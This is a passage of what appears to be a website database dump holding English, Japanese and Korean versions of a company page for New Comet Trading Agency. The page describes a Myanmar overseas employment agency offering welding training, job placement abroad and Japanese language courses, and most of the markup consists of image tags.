data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-15_1.jpg\"><img data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-16_1.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-17_1.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-18_1.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_1.jpg\"><img data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-20_1.jpg\"><img data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f42194d2-173d-4d4b-ac0c-284914e1cb87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-30_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f127d213-3626-4b42-bc37-8092a71b102e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-31_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"71bc98fd-06ba-41c0-bcf6-b00ac31d60c2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-32_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"e2aa83c9-dcae-4217-b822-f3873b24be0e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-33_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"97341ea9-c3d9-4a97-b53e-fcd700908167\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-34_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"3d0fcd94-7f1e-4ab3-b585-7de2b6abb4a2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-35_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0fcd4e94-95d7-4068-bb81-324b11b42f0b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-36_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0619bbdf-c510-43bc-9e9b-533659637d64\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-37_1.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ff1153a3-aa9c-4673-bf92-21b3b0b9331d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-38_1.jpg\"><img data-entity-uuid=\"0170f578-5243-4700-a630-995e3e009f65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-39_2.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_1.jpg\">', '', 'full_html'),
('page', 0, 23, 267, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30.jpg\" data-align=\"center\" data-entity-uuid=\"891213d9-115b-4b86-8d26-3ebbbbeb98a8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-31.jpg\" data-align=\"center\" data-entity-uuid=\"95019304-f6cb-4eaa-90da-ef0d7f51ee47\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-32.jpg\" data-align=\"center\" data-entity-uuid=\"361d538d-8be6-49d8-ae4e-5ac9247fd5b9\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-33.jpg\" data-align=\"center\" data-entity-uuid=\"e46b1924-0cc4-41fc-baa4-df9dd73fbec8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-34.jpg\" data-align=\"center\" data-entity-uuid=\"809ca92e-91d6-401f-b00b-567cc35ce1c5\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35.jpg\" data-align=\"center\" data-entity-uuid=\"667d5781-8402-43e6-853f-ec90e796e6c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36.jpg\" data-align=\"center\" data-entity-uuid=\"58b87ffa-6876-47b0-9e6e-d43d2c7aff38\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37.jpg\" data-align=\"center\" data-entity-uuid=\"7b3b8c38-5bbf-4e74-85eb-618ca90b2db6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38.jpg\" data-align=\"center\" data-entity-uuid=\"d0e647b4-4413-4a58-b4cb-91c95524d97f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39.jpg\" data-align=\"center\" data-entity-uuid=\"ad197c72-ff23-4b15-b4ad-d15c791e6a77\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 23, 267, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1-NC_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_1.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-2_0.jpg\"><img data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_0.jpg\"><img data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_0.jpg\" alt=\"\" data-align=\"center\"><p>&nbsp;</p><img data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_0.jpg\"><img data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-13_0.jpg\" alt=\"\"><img data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-14_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-15_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-16_0.jpg\"><img data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-17_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-18_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_0.jpg\" alt=\"\"><img data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-20_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"3aae8220-86a7-4232-91d1-58e14468ec77\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-30_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"031623ed-3c0b-4a1b-acd5-2d701d16ebac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-31_0.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ef87488d-b6fc-43b9-a474-536a45ca31b3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-32_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"b6b3f255-33bb-4aa9-bf27-91cff7be1296\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-33_0.jpg\"><img data-entity-uuid=\"19536b68-3af1-4ad0-9b3f-6a52f8d321d4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-34_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"99f5c203-f9a2-461a-8abc-2c8ba6a07f85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-35_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"a6cddcbb-87bf-46e9-b5f0-6eb2c81ee34a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-36_0.jpg\" alt=\"\"><img data-entity-uuid=\"6e3b7635-3292-469e-a404-d217c165d0c8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-37_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"96bb0f24-5735-4d44-9780-209fc82eba38\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-38_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"b0020490-36a6-4ed1-bde8-eecc0d0e0bc0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-39_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\">', '', 'full_html'),
('page', 0, 23, 267, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1-NC_1.jpg\"><img data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-15_1.jpg\"><img data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-16_1.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-17_1.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-18_1.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_1.jpg\"><img data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-20_1.jpg\"><img data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" 